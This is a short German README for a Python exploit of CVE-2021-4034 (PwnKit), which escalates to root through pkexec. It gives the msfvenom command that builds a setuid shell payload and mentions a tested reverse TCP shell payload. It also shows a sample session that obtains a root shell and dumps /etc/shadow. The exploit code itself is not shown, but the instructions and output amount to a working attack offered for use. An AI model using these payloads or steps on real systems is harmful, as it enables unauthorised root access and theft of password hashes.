
Python-Exploit für CVE-2021-4034 (PwnKit), das Rechte auf Root eskaliert, indem es über pkexec eine Root-Shell mit msfvenom-Payloads erzeugt.
Python3-Code zum Ausnutzen von CVE-2021-4034 (PWNKIT). Dies war eine Übung in „Kann ich das in Python zum Laufen bringen?“, und nicht als robuster Exploit gedacht. Es funktioniert bei mir, es gibt wahrscheinlich Fehler.
Der Standard-Payload startet eine Shell als root, erzeugt aus msfvenom:
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
Ich habe auch linux/x64/shell_reverse_tcp getestet. Stelle sicher, dass du
das Argument PrependSetuid=true an msfvenom übergibst, sonst bekommst du nur
eine Shell als Benutzer und nicht als root.
Der Code ist von blasty abgeschaut, das Original ist hier verfügbar.
$ python CVE-2021-4034.py
[+] Erstelle Shared Library für den Exploit-Code.
[+] Rufe execve() auf
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#